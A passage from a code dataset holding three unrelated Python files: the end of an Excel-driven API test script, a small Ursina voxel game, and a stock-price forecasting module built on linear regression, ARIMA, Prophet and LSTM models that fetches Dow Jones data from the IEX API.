print(\"请求params:%s\" % params)\n\n try:\n bodydata = eval(testdata[\"body\"])\n except:\n bodydata = {}\n\n # 判断传data数据还是json\n if type == \"data\":\n body = bodydata\n elif type == \"json\":\n body = json.dumps(bodydata)\n else:\n body = bodydata\n\n # 判断选择调用request的某个方法\n try:\n if method == \"post\":\n print(\"post请求body类型为:%s ,body内容为:%s\" % (type, body))\n r = requests.post(url=url,data=params,headers={'content-type': 'application/json'})\n print(r.status_code)\n\n elif method == 'get':\n print(\"get请求!\") # body类型为:%s ,body内容为:%s\" % (type, body))\n r = requests.get(url=url, data=params)\n\n elif method == 'patch':\n pass\n\n elif method == 'put':\n pass\n else:\n print('其他请求,结束!')\n return None\n\n print(\"页面返回信息:%s\" % r.content.decode(\"utf-8\"))\n\n # 接受返回数据\n res = {}\n res['id'] = testdata['id']\n res['rowNum'] = testdata['id'] + 1 # 第一行被字段占用,所以需要\n res[\"statuscode\"] = str(r.status_code) # 状态码转成str\n res[\"text\"] = r.content.decode(\"utf-8\")\n res[\"times\"] = str(r.elapsed.total_seconds()) # 接口请求时间转str\n\n if res[\"statuscode\"] != \"200\":\n res[\"error\"] = res['text']\n else:\n res[\"error\"] = \"\"\n\n res[\"msg\"] = \"\"\n\n # 进行判断\n if testdata[\"checkpoint\"] 
in res[\"text\"]:\n res[\"result\"] = \"pass\"\n print(\"用例测试结果: %s---->%s\" % (test_nub, res[\"result\"]))\n else:\n res[\"result\"] = \"fail\"\n return res\n\n except Exception as msg:\n res[\"msg\"] = str(msg)\n return res\n\ndef wirte_result(result, filename=\"result.xlsx\"):\n # 返回结果的行数row_nub\n row_nub = result['rowNum']\n # 写入statuscode\n wt = Write_excel(filename)\n wt.write(row_nub, 9, result['statuscode']) # 写入返回状态码statuscode,第8列\n wt.write(row_nub, 10, result['times']) # 耗时\n wt.write(row_nub, 11, result['error']) # 状态码非200时的返回信息\n wt.write(row_nub, 13, result['result'])\n wt.write(row_nub, 14, result['msg']) # 抛异常\n\n\nif __name__ == \"__main__\":\n data = read_excel.ApiDefine_change('F:\\Python_project\\Ademo_unittest_logging_email_test\\dataExcel\\出口合理性分析导出接口new.xlsx').dict_data()\n print(data)\n #s = requests.session()\n res = send_requests(data)\n copy_excel(\"出口合理性分析导出接口new.xlsx\", \"result.xlsx\")\n wirte_result(res, filename=\"result.xlsx\")\n","repo_name":"lipingxx/Ademo_requests_unittest_ddt_excel","sub_path":"common/requestsModule.py","file_name":"requestsModule.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"33155579551","text":"from turtle import position\nfrom pygments import highlight\nfrom ursina import *\nfrom ursina.prefabs.first_person_controller import FirstPersonController\n\napp = Ursina()\n\n# define a Voxel class\n# by setting the parent to scene and the model to 'cube' it becomes a 3d button\n\nclass Voxel(Button):\n def __init__(self, position=(0,0,0)):\n super().__init__(\n parent = scene,\n position = position,\n model = 'cube',\n origin_y = .5,\n texture = 'white_cube',\n color = color.color(0,0,random.uniform(.9, 1.0)),\n highlight_color = color.lime,\n )\n\n def input(self, key):\n if self.hovered:\n if key == 'left mouse down':\n voxel = Voxel(position=self.position + mouse.normal)\n\n if key == 'right mouse down':\n destroy(self)\n\nfor z in range(8):\n for x in range(8):\n voxel = Voxel(position=(x,0,z))\n\nplayer = FirstPersonController()\napp.run()","repo_name":"FDlucifer/python-climb-learning-tutorial","sub_path":"advanced-python-tutorial/3D Game Development/main3.py","file_name":"main3.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"32"} +{"seq_id":"37173301583","text":"import warnings\nimport os\n\nimport math\nimport random\nimport datetime\nimport pytz\nimport requests\nimport pickle\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nfrom pandas.io.json import json_normalize\n\nfrom scipy.stats.stats import pearsonr\n\n# Linear Regression\nfrom sklearn.linear_model import LinearRegression\n\n# Arima\nfrom pyramid.arima import auto_arima\n\n# Facebook's Prophet\nfrom fbprophet import Prophet\n\n# Long Short Term Memory\nfrom sklearn.preprocessing import MinMaxScaler\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, LSTM\n\n# Makes Keras picklable\nfrom tools.make_keras_picklable import make_keras_picklable\nmake_keras_picklable()\n\n\n\n#--------------------------------------\n# Common functions\n#--------------------------------------\n\ndef expand_date_in_dataframe(df):\n \"\"\"\n It breaks the date attibute (assuming it's a datetime) of a dataframe in more fileds\n for year, month, day, week, day of week and day of year.\n \"\"\"\n df['year'] = df.date.dt.year\n df['month'] = df.date.dt.month\n 
df['day'] = df.date.dt.day\n df['week'] = df.date.dt.week\n df['dayofweek'] = df.date.dt.dayofweek\n df['dayofyear'] = df.date.dt.dayofyear\n\n\ndef add_timestamp_to_dataframe(df):\n \"\"\"\n It add a representation of the date attibute (assuming it's a datetime) as a timestamp.\n \"\"\"\n df['timestamp'] = df.date.values.astype(np.int64)\n\n\ndef str_to_datetime(date):\n \"\"\"\n Converts a string into a datetime.\n\n :param str date: The string representation in the format 'yyyy-mm-dd' of the date to convert.\n :return: The resulting datetime.\n :rtype: datetime.datetime\n \"\"\"\n return datetime.datetime.strptime(date, '%Y-%m-%d')\n\n\ndef datetime_array_to_dataframe(days):\n \"\"\"\n Gets a dataframe from an array of dates.\n\n :param list[datetime.datetime] date: The array of dates.\n :return: The dataframe.\n :rtype: pandas.DataFrame\n \"\"\"\n return pd.DataFrame({'date': days})\n\n\n\n#--------------------------------------\n# Dataset management\n#--------------------------------------\n\nclass Dataset:\n \"\"\"\n This class is used to manage the dataset that contains the hsitoric stock prices\n for the companies contemplated in the Dow Jones Industrial Average.\n \"\"\"\n\n \"\"\" Ticker symbols of the companies contemplated in the Dow Jones Industrial Average. \"\"\"\n DJIA_TICKERS = [\n 'BA', 'PFE', 'MCD', 'WMT', 'KO', 'MRK', 'HD', 'V', 'JNJ', 'VZ',\n 'CSCO', 'AXP', 'TRV', 'DIS', 'MSFT', 'UNH', 'DWDP', 'CAT', 'AAPL', 'UTX',\n 'MMM', 'JPM', 'IBM', 'GS', 'XOM', 'INTC', 'NKE', 'CVX', 'PG', 'WBA' ]\n\n \"\"\" This is the symbol used by the actual average, i.e. the Dow Jones Industrial Average. \"\"\"\n DJIA_SYMBOL = 'DIA'\n\n \"\"\" Value used to get the historical data from 5 years ago. \"\"\"\n HIST_5Y = '5y'\n\n \"\"\" Value used to get the historical data from 1 year ago. \"\"\"\n HIST_1Y = '1y'\n\n \"\"\" Value used to get the historical data from 1 month ago. \"\"\"\n HIST_1M = '1m'\n\n \"\"\"\n This is the template to create the URL to extract historical stock prices\n from the IEX API.\n \"\"\"\n __IEX_API_URL_TEMPLATE = 'https://api.iextrading.com/1.0/stock/{}/chart/{}'\n\n\n def __init__(self, dataframe=None):\n \"\"\"\n The constructor of Dataset.\n\n :param pandas.DataFrame df: The dataframe containing stock price historical records,\n which will be actual data.\n \"\"\"\n self.dataframe = dataframe\n\n\n @staticmethod\n def __preprocess_dataframe(df):\n \"\"\"\n Pre-processes a dataframe containing stock price historical records (from IEX)\n by removing the columns that are not useful to make future predictions\n and expanding the date in more columns.\n\n :param pandas.DataFrame df: The dataframe containing stock price historical records.\n :return: The pre-processed dataframe.\n :rtype: pandas.DataFrame\n \"\"\"\n formated_df = df.drop(['label',\n 'change', 'changeOverTime', 'changePercent',\n 'high', 'low', 'open',\n 'unadjustedVolume', 'volume', 'vwap'],\n axis=1)\n\n return formated_df\n\n\n @staticmethod\n def __get_dataframe_for_ticker(ticker_symbol, hist_period):\n \"\"\"\n Retrieves the historic prices for a particuler stock from the data source,\n i.e. 
the IEX API.\n\n :param str ticker_symbol: The ticker symbol or symbols to filter the data.\n :param str hist_period: The period to retrieve historical records,\n p.e '5y' for 5 years, '1y' for 1 year, '1m' for 1 month, etc.\n :return: The dataframe containing the historic prices.\n :rtype: pandas.DataFrame\n \"\"\"\n # Getting the historic records from IEX\n r = requests.get(url=Dataset.__IEX_API_URL_TEMPLATE.format(ticker_symbol.lower(), hist_period))\n df = json_normalize(r.json())\n\n # Converting the date to a datetime\n df.date = pd.to_datetime(df.date, format='%Y-%m-%d')\n\n # Adding the ticker symbol as a new column\n df.insert(loc=0, column='symbol', value=ticker_symbol)\n\n return Dataset.__preprocess_dataframe(df)\n\n\n @staticmethod\n def __get_djia_dataframe(hist_period):\n \"\"\"\n Gets a dataframe containing historic prices for stocks in the Dow Jones Industrial Average.\n\n :param str hist_period: The period to retrieve historical records,\n p.e '5y' for 5 years, '1y' for 1 year, '1m' for 1 month, etc.\n :return: The dataframe containing the historic prices.\n :rtype: pandas.DataFrame\n \"\"\"\n # Getting the historic records of the average\n df = Dataset.__get_dataframe_for_ticker(Dataset.DJIA_SYMBOL, hist_period)\n\n # Retrieves the historic records for each one of the ticker symbols in the\n # Dow Jones Industrial Average\n for ticker_symbol in Dataset.DJIA_TICKERS:\n df = df.append(Dataset.__get_dataframe_for_ticker(ticker_symbol, hist_period))\n\n return df\n\n\n @staticmethod\n def __update_djia_dataframe(df):\n \"\"\"\n Updates a dataframe containing historic prices for stocks in the Dow Jones Industrial Average,\n by retrieving the most recent records from the information source.\n\n :param pandas.DataFrame hist_period: The dataframe containing stock price historical records.\n :return: The dataframe containing the historic prices.\n :rtype: pandas.DataFrame\n \"\"\"\n\n # Getting the amount of days that need to be updated\n last_recorded_day = max(df.date)\n today = datetime.datetime.now()\n days_to_update = (today - last_recorded_day).days\n\n # Deciding the historic period to request to the source according to the days that\n # need to be updated\n hist_period = Dataset.HIST_5Y\n if days_to_update < 1:\n return df\n elif days_to_update < 28:\n hist_period = Dataset.HIST_1M\n elif days_to_update < 365:\n hist_period = Dataset.HIST_1Y\n\n # Getting the data frame containing the missing records\n last_df = Dataset.__get_djia_dataframe(hist_period)\n\n # Appending the missing records, dropping the duplicates and returning\n return df.append(last_df).drop_duplicates(['symbol', 'date'], keep='last')\n\n\n @staticmethod\n def loadDatasetFromFile(file_name):\n \"\"\"\n Loads the dataset from a file where data was previously stored.\n\n :param str file_name: The name of the file to load the data from. \n \"\"\"\n with open(file_name, 'rb') as fp:\n return Dataset(pickle.load(fp))\n\n\n def saveDataToFile(self, file_name=None):\n \"\"\"\n Saves the current dataset to a file.\n\n :param file_name: The name of the file to save the data,\n if None the data is saved to a file in the 'data' directory\n using a name of the form 'djia_yyyymmdd-yyyymmdd.pkl'\n with the minimum and maximum recorded dates. 
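
            For example (illustrative dates), a dataset whose records span
            2014-05-20 through 2019-05-17 would be written to
            data/djia_20140520-20190517.pkl by default.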
\n :type file_name: str or None\n :return: The name of the file used to store the data.\n :rtype: str\n \"\"\"\n if file_name is None:\n file_name = os.path.join(\n 'data',\n 'djia_{:%Y%m%d}-{:%Y%m%d}.pkl'.format(min(self.dataframe.date), max(self.dataframe.date)))\n\n with open(file_name, 'wb') as fp:\n pickle.dump(self.dataframe, fp)\n\n return file_name\n\n\n @staticmethod\n def createDataset(hist_period=HIST_5Y):\n \"\"\"\n Creates a dataset with brand new data,\n by default it retrieves historical records from the last 5 years.\n\n :param str hist_period: The period to retrieve historical records, 5 years ('5y') by default.\n :return: The new dataset.\n :rtype: Dataset\n \"\"\"\n return Dataset(Dataset.__get_djia_dataframe(hist_period))\n\n\n def updateData(self):\n \"\"\"\n Updates the dataset by getting the most recent history records from the source.\n Note: This method is intended to be run periodicaly in order to keep the dataset up to date.\n \"\"\"\n self.dataframe = Dataset.__update_djia_dataframe(self.dataframe)\n\n\n def getDataframe(self, ticker_symbol=None, from_date=None, to_date=None):\n \"\"\"\n Gets a dataframe containing a subset of the records of the current dataset,\n which is obtained by filtering by a ticker symbol or list (array) of ticker symbols\n and/or a date range.\n\n :param ticker_symbol: The ticker symbol or symbols to filter the data.\n :type ticker_symbol: str or list[str] or None\n :param from_date: The minimum date to appear in the records of the subset.\n :type from_date: datetime.datetime or None\n :param to_date: The maximum date to appear in the records of the subset.\n :type to_date: datetime.datetime or None\n :return: The dataframe with the subset resulted of filtering the dataset.\n :rtype: pandas.DataFrame\n \"\"\"\n df = self.dataframe\n\n if ticker_symbol is not None:\n if isinstance(ticker_symbol, str): # If ticker_symbol symbol is a string\n df = df.query(\"symbol == '{}'\".format(ticker_symbol))\n elif isinstance(ticker_symbol, list): # If ticker_symbol symbol is an array\n # Creates a query expression as a sequence of ORs\n ticker_symbol_query = None\n for t in ticker_symbol:\n ticker_symbol_exp = \"symbol == '{}'\".format(t)\n if ticker_symbol_query is None:\n ticker_symbol_query = ticker_symbol_exp\n else:\n ticker_symbol_query += \"or \" + ticker_symbol_exp\n df = df.query(ticker_symbol_query)\n\n if from_date is not None:\n df = df.query(\"date >= '{}'\".format(from_date))\n\n if to_date is not None:\n df = df.query(\"date <= '{}'\".format(to_date))\n\n return df\n\n\n\n def getSubset(self, ticker_symbol=None, from_date=None, to_date=None):\n \"\"\"\n Gets a subset of the current dataset filtered \n by a ticker symbol or list (array) of ticker symbols and/or a date range.\n\n :param ticker_symbol: The ticker symbol or symbols to filter the data.\n :type ticker_symbol: str or list[str] or None\n :param from_date: The minimum date to appear in the records of the subset.\n :type from_date: datetime.datetime or None\n :param to_date: The maximum date to appear in the records of the subset.\n :type to_date: datetime.datetime or None\n :return: The subset resulted of filtering the dataset.\n :rtype: Dataset\n \"\"\"\n df = self.getDataframe(ticker_symbol=ticker_symbol, from_date=from_date, to_date=to_date)\n return Dataset(df)\n\n\nclass TradingDaysHelper:\n \"\"\"\n This is a helper to retrieve the days that the market is open.\n The market holidyas are loaded from a file, by default 'market_holidays.txt'.\n \"\"\"\n\n def __init__(self, 
market_holidays_file='market_holidays.txt'):\n \"\"\"\n The constructor.\n\n :param str market_holidays_file: The file containing the market holidays,\n by default 'market_holidays.txt'.\n \"\"\"\n self.market_holidays = []\n\n with open(market_holidays_file) as f:\n lines = f.readlines()\n\n for line in lines:\n self.market_holidays.append(datetime.datetime.strptime(line.strip(), '%Y-%m-%d'))\n\n\n def __is_trading_day(self, day):\n \"\"\"\n Verifies if in a particular day the market is open.\n\n :param datetime.datetime day: The day to verify if the marke is open.\n :return: True if the marke is open of False otherwise.\n :rtype: bool\n \"\"\"\n day_of_week = day.weekday()\n if day_of_week == 5 or day_of_week == 6 or day in self.market_holidays:\n return False\n else:\n return True\n\n\n def get_trading_days_in_range(self, start_date, end_date):\n \"\"\"\n Getting the trading days existing in a date range.\n\n :param datetime.datetime from_date: The starting date of the range.\n :param datetime.datetime to_date: The ending date of the range.\n :return: A list of the trading days in the specified date range.\n :rtype: list[datetime.datetime]\n \"\"\"\n trading_days = []\n\n current_day = start_date\n while (current_day <= end_date):\n if self.__is_trading_day(current_day):\n trading_days.append(current_day)\n current_day += datetime.timedelta(days=1)\n\n return trading_days\n\n\n def get_trading_days_after(self, date, num_trading_days):\n \"\"\"\n Getting a specific number of trading days after a given date.\n\n :param datetime.datetime date: The date after which training days are going to be retrieved.\n :param int num_trading_days: The number of training days to get.\n :return: A list containing the trading days.\n :rtype: list[datetime.datetime]\n \"\"\"\n trading_days = []\n\n current_day = date\n while (len(trading_days) < num_trading_days):\n current_day += datetime.timedelta(days=1)\n if self.__is_trading_day(current_day):\n trading_days.append(current_day)\n\n return trading_days\n\n\n\n#--------------------------------------\n# Machine Learning Models\n#--------------------------------------\n\nclass StockForecasterModel:\n \"\"\"\n This is a super-class to represent ML models/methods to perform predictions\n for the stock closing price for a particular company.\n \"\"\"\n\n def __init__(self, ticker_symbol, trading_days_helper=None):\n \"\"\"\n The constructor.\n\n :param str ticker_symbol: The ticker symbol to perform predictions for.\n :param trading_days_helper: The helper object to get the days that the market is open/closed.\n :type trading_days_helper: TradingDaysHelper or None\n \"\"\"\n self.short_name = None\n self.long_name = None\n\n self.ticker_symbol = ticker_symbol\n\n self.training_start = None\n self.training_end = None\n\n if trading_days_helper is None:\n self.trading_days_helper = TradingDaysHelper()\n else:\n self.trading_days_helper = trading_days_helper\n\n\n def train(self, base_dataset, start_date=None, end_date=None):\n \"\"\"\n Trains the model.\n\n :param Dataset base_dataset: The dataset used to extract the training set\n in accordance with the date range. 
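
        This base-class implementation only defines the interface; calling it
        directly raises NotImplementedError, and each concrete subclass below
        (Linear Regression, Arima, Prophet) supplies the actual training step.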
\n :param start_date: The minimum date for the records used in the training set.\n :type start_date: datetime.datetime or None\n :param end_date: The maximum date for the records used in the training set.\n :type end_date: datetime.datetime or None\n \"\"\"\n raise NotImplementedError('Please Implement this method.')\n\n\n def predict(self, from_date, to_date=None, base_dataset=None):\n \"\"\"\n Performs closing price predictions for a given date range.\n\n :param datetime.datetime from_date: The initial date of the date range to predict.\n :param to_date: The final date of the date range to predict.\n :type to_date: datetime.datetime or None\n :param base_dataset: The dataset used to support the prediction,\n in case that the model supports that.\n :type base_dataset: Dataset or None\n :return: A dataframe containing the date of the trading days in the given range\n and their respective predicted closing price.\n :rtype: pandas.DataFrame\n \"\"\"\n raise NotImplementedError('Please Implement this method.')\n\n\n @staticmethod\n def loadFromFile(file_name):\n \"\"\"\n Loads the model from a file.\n\n :param str file_name: The name of the file to load the model from. \n \"\"\"\n with open(file_name, 'rb') as fp:\n return pickle.load(fp)\n\n\n def saveToFile(self, file_name=None):\n \"\"\"\n Saves the current model to a file.\n\n :param file_name: The name of the file to save the model,\n if None the data is saved to a file in the 'data' directory\n using a name of the form 'model_name_ticker_yyyymmdd-yyyymmdd.pkl'\n with the minimum and maximum dates used for training. \n :type file_name: str or None\n :return: The name of the file used to store the model.\n :rtype: str\n \"\"\"\n if file_name is None:\n file_name = os.path.join(\n 'data',\n 'model_{}_{}_{:%Y%m%d}-{:%Y%m%d}.pkl'.format(\n self.short_name, self.ticker_symbol, self.training_start, self.training_end))\n\n with open(file_name, 'wb') as fp:\n pickle.dump(self, fp)\n\n return file_name\n\n\nclass LinearRegressionStockForecaster(StockForecasterModel):\n \"\"\"\n This represents a stock forecaster model based on linear regression.\n \"\"\"\n\n def __init__(self, ticker_symbol, trading_days_helper=None):\n \"\"\"\n The constructor.\n\n :param str ticker_symbol: The ticker symbol to perform predictions for.\n :param trading_days_helper: The helper object to get the days that the market is open/closed.\n :type trading_days_helper: TradingDaysHelper or None\n \"\"\"\n StockForecasterModel.__init__(self, ticker_symbol, trading_days_helper=trading_days_helper)\n self.short_name = 'LinearRegression'\n self.long_name = 'Linear Regression'\n\n\n def train(self, base_dataset, start_date=None, end_date=None):\n \"\"\"\n Trains the model.\n\n :param Dataset base_dataset: The dataset used to extract the training set\n in accordance with the date range. 
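
        A minimal illustrative call, where ds stands for any populated
        Dataset (for instance one built with Dataset.createDataset())::

            model = LinearRegressionStockForecaster('AAPL')
            model.train(ds, start_date=str_to_datetime('2017-01-01'),
                        end_date=str_to_datetime('2018-12-31'))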
\n :param start_date: The minimum date for the records used in the training set.\n :type start_date: datetime.datetime or None\n :param end_date: The maximum date for the records used in the training set.\n :type end_date: datetime.datetime or None\n \"\"\"\n if start_date is not None and end_date is not None and start_date > end_date:\n raise ValueError('Invalid training date range.')\n\n training_set = base_dataset.getDataframe(ticker_symbol=self.ticker_symbol,\n from_date=start_date, to_date=end_date)\n\n self.training_start = min(training_set.date)\n self.training_end = max(training_set.date)\n\n # Pre-Processing\n # Only the timestamp (which is a numeric value) is considered as predictor,\n # since the linear regresion does not support datetimes\n add_timestamp_to_dataframe(training_set)\n x = training_set[['timestamp']]\n y = training_set.close\n\n self.model = LinearRegression()\n self.model.fit(x, y)\n\n\n def predict(self, from_date, to_date=None, base_dataset=None):\n \"\"\"\n Performs closing price predictions for a given date range.\n\n :param datetime.datetime from_date: The initial date of the date range to predict.\n :param to_date: The final date of the date range to predict.\n :type to_date: datetime.datetime or None\n :param base_dataset: This is not supported for this model.\n :type base_dataset: Dataset or None\n :return: A dataframe containing the date of the trading days in the given range\n and their respective predicted closing price.\n :rtype: pandas.DataFrame\n \"\"\"\n if from_date is None:\n raise ValueError('Invalid initial date.')\n if to_date is None:\n to_date = from_date\n if from_date > to_date:\n raise ValueError('Invalid date range to predict.')\n\n if base_dataset is not None:\n warnings.warn(\"Prediction using a base dataset is not supported.\")\n\n # Getting the trading days in the predicting date range\n days_to_predict = self.trading_days_helper.get_trading_days_in_range(from_date, to_date)\n x_train = datetime_array_to_dataframe(days_to_predict)\n\n # Pre-Processing\n # Only the timestamp (which is a numeric value) is considered as predictor,\n # since the linear regresion does not support datetimes\n add_timestamp_to_dataframe(x_train)\n x_train = x_train[['timestamp']]\n\n y = self.model.predict(x_train)\n \n return pd.DataFrame({'symbol': self.ticker_symbol,\n 'date': days_to_predict,\n 'predicted_price': y})\n\n\nclass ArimaStockForecaster(StockForecasterModel):\n \"\"\"\n This represents a stock forecaster model based on Arima.\n \"\"\"\n\n def __init__(self, ticker_symbol, trading_days_helper=None):\n \"\"\"\n The constructor.\n\n :param str ticker_symbol: The ticker symbol to perform predictions for.\n :param trading_days_helper: The helper object to get the days that the market is open/closed.\n :type trading_days_helper: TradingDaysHelper or None\n \"\"\"\n StockForecasterModel.__init__(self, ticker_symbol, trading_days_helper=trading_days_helper)\n self.short_name = 'Arima'\n self.long_name = 'Arima'\n\n\n def train(self, base_dataset, start_date=None, end_date=None):\n \"\"\"\n Trains the model.\n\n :param Dataset base_dataset: The dataset used to extract the training set\n in accordance with the date range. 
\n :param start_date: The minimum date for the records used in the training set.\n :type start_date: datetime.datetime or None\n :param end_date: The maximum date for the records used in the training set.\n :type end_date: datetime.datetime or None\n \"\"\"\n if start_date is not None and end_date is not None and start_date > end_date:\n raise ValueError('Invalid training date range')\n\n training_set = base_dataset.getDataframe(ticker_symbol=self.ticker_symbol,\n from_date=start_date, to_date=end_date)\n self.training_start = min(training_set.date)\n self.training_end = max(training_set.date)\n\n # Pre-Processing\n # ARIMA only receives as sequence of value in the training,\n # then only the sequence of closing prices is needed\n training_set = training_set.close\n\n self.model = auto_arima(training_set,\n start_p=1, start_q=1, max_p=3, max_q=3, m=12, start_P=0,\n seasonal=True, d=1, D=1, trace=True,\n error_action='ignore', suppress_warnings=True)\n self.model.fit(training_set)\n\n\n def predict(self, from_date, to_date=None, base_dataset=None):\n \"\"\"\n Performs closing price predictions for a given date range.\n\n :param datetime.datetime from_date: The initial date of the date range to predict.\n :param to_date: The final date of the date range to predict.\n :type to_date: datetime.datetime or None\n :param base_dataset: This is not supported for this model.\n :type base_dataset: Dataset or None\n :return: A dataframe containing the date of the trading days in the given range\n and their respective predicted closing price.\n :rtype: pandas.DataFrame\n \"\"\"\n if from_date is None:\n raise ValueError('Invalid initial date')\n if to_date is None:\n to_date = from_date\n if from_date > to_date:\n raise ValueError('Invalid date range to predict')\n if from_date <= self.training_end:\n raise ValueError('Date range to predict should be after last date used for training')\n\n if base_dataset is not None:\n warnings.warn(\"Prediction using a base dataset is not supported.\")\n\n # Getting the trading days to predict, including some gaps between the end of the training\n # and the begining of the prediction range\n prediction_start = self.training_end + datetime.timedelta(days=1)\n days_to_predict = self.trading_days_helper.get_trading_days_in_range(prediction_start, to_date)\n\n # Pre-Processing\n # For ARIMA only the number of future points to predict is required,\n # then only the number of trading days to predict need to be calculated\n y = self.model.predict(n_periods=len(days_to_predict))\n \n return pd.DataFrame({'symbol': self.ticker_symbol,\n 'date': days_to_predict,\n 'predicted_price': y}\n )\\\n .query(\"date >= '{}' and date <= '{}'\".format(from_date, to_date))\n # Filtering to get just the days in the given prediction range\n\n\nclass ProphetStockForecaster(StockForecasterModel):\n \"\"\"\n This represents a stock forecaster model based on Facebook's Prophet.\n \"\"\"\n\n def __init__(self, ticker_symbol, trading_days_helper=None):\n \"\"\"\n The constructor.\n\n :param str ticker_symbol: The ticker symbol to perform predictions for.\n :param trading_days_helper: The helper object to get the days that the market is open/closed.\n :type trading_days_helper: TradingDaysHelper or None\n \"\"\"\n StockForecasterModel.__init__(self, ticker_symbol, trading_days_helper=trading_days_helper)\n self.short_name = 'Prophet'\n self.long_name = 'Prophet'\n\n\n def train(self, base_dataset, start_date=None, end_date=None):\n \"\"\"\n Trains the model.\n\n :param Dataset base_dataset: The 
dataset used to extract the training set\n in accordance with the date range. \n :param start_date: The minimum date for the records used in the training set.\n :type start_date: datetime.datetime or None\n :param end_date: The maximum date for the records used in the training set.\n :type end_date: datetime.datetime or None\n \"\"\"\n if start_date is not None and end_date is not None and start_date > end_date:\n raise ValueError('Invalid training date range')\n\n self.training_set = base_dataset.getDataframe(ticker_symbol=self.ticker_symbol,\n from_date=start_date, to_date=end_date)\n self.training_start = min(self.training_set.date)\n self.training_end = max(self.training_set.date)\n\n # Pre-Processing\n # Prophet takes the dates as predictors in a column called 'ds',\n # and the outcomes in a column called 'y',\n # then the columns 'date' needs to be renamed as 'ds', and 'close' as 'y'\n self.training_set = pd.DataFrame(self.training_set, columns=['date', 'close'])\n self.training_set.rename(columns={'close': 'y', 'date': 'ds'}, inplace=True)\n\n self.model = Prophet(daily_seasonality=True)\n self.model.fit(self.training_set)\n\n\n def predict(self, from_date, to_date=None, base_dataset=None):\n \"\"\"\n Performs closing price predictions for a given date range.\n\n :param datetime.datetime from_date: The initial date of the date range to predict.\n :param to_date: The final date of the date range to predict.\n :type to_date: datetime.datetime or None\n :param base_dataset: This is not supported for this model.\n :type base_dataset: Dataset or None\n :return: A dataframe containing the date of the trading days in the given range\n and their respective predicted closing price.\n :rtype: pandas.DataFrame\n \"\"\"\n if from_date is None:\n raise ValueError('Invalid initial date')\n if to_date is None:\n to_date = from_date\n if from_date > to_date:\n raise ValueError('Invalid date range to predict')\n if from_date <= self.training_end:\n raise ValueError('Date range to predict should be after last date used for training')\n\n if base_dataset is not None:\n warnings.warn(\"Prediction using a base dataset is not supported.\")\n\n # Getting the trading days to predict, including some gaps between the end of the training\n # and the begining of the prediction range\n prediction_start = self.training_end + datetime.timedelta(days=1) \n days_to_predict = self.trading_days_helper.get_trading_days_in_range(prediction_start, to_date)\n\n # Pre-Processing\n # For Prophet only the number of future points to predict is required,\n # then only the number of trading days to predict need to be calculated\n x = self.model.make_future_dataframe(periods=len(days_to_predict))\n\n y = self.model.predict(x)['yhat'][self.training_set.shape[0]:]\n\n return pd.DataFrame({'symbol': self.ticker_symbol,\n 'date': days_to_predict,\n 'predicted_price': y})\\\n .query(\"date >= '{}' and date <= '{}'\".format(from_date, to_date))\n # Filtering to get just the days in the given prediction range\n\n\nclass LongShortTermMemoryStockForecaster(StockForecasterModel):\n \"\"\"\n This represents a stock forecaster model based Long Short Term Memory\n (with Recurrent Neural Networks).\n \"\"\"\n\n def __init__(self, ticker_symbol, trading_days_helper=None, timesteps=60, training_epocs=2):\n \"\"\"\n The constructor.\n\n :param str ticker_symbol: The ticker symbol to perform predictions for.\n :param trading_days_helper: The helper object to get the days that the market is open/closed.\n :type trading_days_helper: 
\n        StockForecasterModel.__init__(self, ticker_symbol, trading_days_helper=trading_days_helper)\n        self.short_name = 'LSTM'\n        self.long_name = 'Long Short Term Memory'\n        self.scaler = MinMaxScaler(feature_range=(0, 1))\n        self.timesteps = timesteps\n        self.training_epocs = training_epocs\n\n\n    def train(self, base_dataset, start_date=None, end_date=None):\n        \"\"\"\n        Trains the model.\n\n        :param Dataset base_dataset: The dataset used to extract the training set\n            in accordance with the date range.\n        :param start_date: The minimum date for the records used in the training set.\n        :type start_date: datetime.datetime or None\n        :param end_date: The maximum date for the records used in the training set.\n        :type end_date: datetime.datetime or None\n        \"\"\"\n        if start_date is not None and end_date is not None and start_date > end_date:\n            raise ValueError('Invalid training date range')\n\n        self.training_set = base_dataset.getDataframe(ticker_symbol=self.ticker_symbol,\n                                                      from_date=start_date, to_date=end_date)\n        self.training_start = min(self.training_set.date)\n        self.training_end = max(self.training_set.date)\n\n        # Pre-Processing\n        # LSTM takes as predictors sequences of a given length (time-steps) containing\n        # consecutive values in a time sequence,\n        # the outcome is the following value in the time sequence.\n        # Also the values should be scaled to the range from 0 to 1.\n\n        # The sequence of closing prices is needed as a dataframe\n        self.training_set = pd.DataFrame(self.training_set, columns=['close'])\n        # Scaling the closing prices to the range 0 to 1\n        scaled_training_set = self.scaler.fit_transform(self.training_set)\n\n        # Getting an array of sequences of size (self.timesteps) of consecutive closing prices\n        # and an array with the outcomes\n        x_train, y_train = [], []\n        for i in range(self.timesteps, len(scaled_training_set)):\n            x_train.append(scaled_training_set[i - self.timesteps : i, 0])\n            y_train.append(scaled_training_set[i, 0])\n        x_train, y_train = np.array(x_train), np.array(y_train)\n\n        # Re-shaping the input to feed the LSTM network\n        x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))\n\n        # Creating and fitting the LSTM network\n        self.model = Sequential()\n        self.model.add(LSTM(units=50, return_sequences=True, input_shape=(x_train.shape[1], 1)))\n        self.model.add(LSTM(units=50))\n        self.model.add(Dense(1))\n\n        self.model.compile(loss='mean_squared_error', optimizer='adam')\n        self.model.fit(x_train, y_train, epochs=self.training_epocs, batch_size=1, verbose=2)\n\n\n    def predict(self, from_date, to_date=None, base_dataset=None):\n        \"\"\"\n        Performs closing price predictions for a given date range.\n\n        :param datetime.datetime from_date: The initial date of the date range to predict.\n        :param to_date: The final date of the date range to predict.\n        :type to_date: datetime.datetime or None\n        :param base_dataset: The dataset used to support the prediction.\n        :type base_dataset: Dataset or None\n        :return: A dataframe containing the date of the trading days in the given range\n            and their respective predicted closing price.\n        :rtype: pandas.DataFrame\n        \"\"\"\n        if from_date is None:\n            raise ValueError('Invalid initial date')\n        if to_date is None:\n            to_date = from_date\n        if from_date > to_date:\n            raise ValueError('Invalid date range to predict')\n        if from_date <= self.training_end:\n            raise ValueError('Date range to predict should be after last date used for training')\n\n        # Getting the trading days to predict, also covering the gap between the end of the training\n        # and the beginning of the prediction range\n        prediction_start = self.training_end 